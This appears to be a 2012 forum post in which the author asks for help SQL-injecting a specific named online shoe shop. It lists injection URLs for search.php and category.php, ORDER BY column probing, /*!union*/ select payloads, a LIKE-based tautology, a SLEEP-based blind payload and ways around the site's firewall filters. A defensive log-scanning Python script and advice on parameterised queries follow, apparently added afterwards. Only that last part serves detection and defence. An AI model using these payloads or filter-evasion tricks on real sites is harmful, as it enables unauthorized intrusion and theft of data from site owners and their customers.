WAF + hard to find syntax
Date: August 13, 2012 10:39AM
I've been on this for a week now and it's driving me nuts, because I'm sure that it's injectable but I can't find how. :(
Error URLs:
http://adidasioriginalinike.ro/search.php?keywords=zz&category=&minPrice=1'
http://adidasioriginalinike.ro/search.php?minPrice=1'
http://adidasioriginalinike.ro/search.php?category=31'
http://adidasioriginalinike.ro/category.php?id=69'
I got the number of columns in the table with:
http://adidasioriginalinike.ro/search.php?category=31)+order+by+1--
But when I tried http://adidasioriginalinike.ro/search.php?category=31)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--, I got another error. :(
This seems to select a large amount of data, as it exceeds the memory quota: http://adidasioriginalinike.ro/search.php?category=31)+OR+1+LIKE+1--
The WAF seems to add '\' when it sees ', so maybe it has addslashes and magic_quotes on. Also, it filters '=', which can be replaced with LIKE, and UNION can be replaced with /*!UNION*/, but it seems to filter many more things.
I also tried blind with: http://adidasioriginalinike.ro/search.php?category=31)+AND+1+LIKE+IF((ORD(MID((IFNULL(CAST(DATABASE()+AS+CHAR),0x20)),1,1))+%3E+64),SLEEP(5),1)+AND+(2+LIKE+2, but it gets filtered, and when I try to bypass the filters I get errors.
Help would be much appreciated. :)
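From the defender's side, the probes described in this post (a stray quote, a `)` to break out of a parenthesised clause, `ORDER BY`, the MySQL `/*!...*/` version-comment trick, `=` swapped for `LIKE`, and `SLEEP()`-based timing) are all visible in the web server's access log once the query string is URL-decoded. The following Python is an added example, not code from the post or the site; the log format, host and IP addresses are constructed for illustration.

```python
"""Flag query strings carrying the SQL-injection probes from the post (example code; constructed data)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

PATTERNS = {
    "quote":           re.compile(r"'"),
    "paren_break":     re.compile(r"^\s*\d+\s*\)"),            # value like "31) ..."
    "order_by":        re.compile(r"\border\s+by\b", re.I),
    "version_comment": re.compile(r"/\*!"),                    # MySQL /*!UNION*/ trick
    "union_select":    re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S),
    "like_tautology":  re.compile(r"\b(\d+)\s+like\s+\1\b", re.I),  # "1 LIKE 1" for "1=1"
    "time_based":      re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}

def scan_request(url):
    """Return {param: [pattern names]} for each query parameter that matches a pattern."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl already decoded one layer ('+' -> space, %3E -> '>'); a second pass catches double encoding.
        value = unquote_plus(value)
        hits = [p for p, rx in PATTERNS.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings

def scan_log(lines):
    """Return (path, findings) for every GET request line with at least one hit."""
    alerts = []
    for line in lines:
        m = re.match(r'\S+ \S+ "GET (\S+) HTTP/1\.[01]"', line)
        if m:
            f = scan_request(m.group(1))
            if f:
                alerts.append((m.group(1), f))
    return alerts

# Constructed access-log lines mirroring the probes in the post (placeholder client IP).
SAMPLE_LOG = [
    '203.0.113.5 - "GET /search.php?keywords=shoes&category=31&minPrice=10 HTTP/1.1" 200',
    '203.0.113.5 - "GET /search.php?minPrice=1\' HTTP/1.1" 500',
    '203.0.113.5 - "GET /search.php?category=31)+order+by+1-- HTTP/1.1" 200',
    '203.0.113.5 - "GET /search.php?category=31)+/*!union*/+select+1,2,3-- HTTP/1.1" 500',
    '203.0.113.5 - "GET /search.php?category=31)+OR+1+LIKE+1-- HTTP/1.1" 500',
    '203.0.113.5 - "GET /search.php?category=31)+AND+1+LIKE+IF(1%3E0,SLEEP(5),1)+AND+(2+LIKE+2 HTTP/1.1" 200',
]

if __name__ == "__main__":
    for path, f in scan_log(SAMPLE_LOG):
        print(path, f)
```

Pattern matching like this is a detection aid, not a fix; the durable mitigation for the `search.php` and `category.php` parameters above is parameterised queries with integer casting of `id`, `category` and `minPrice`.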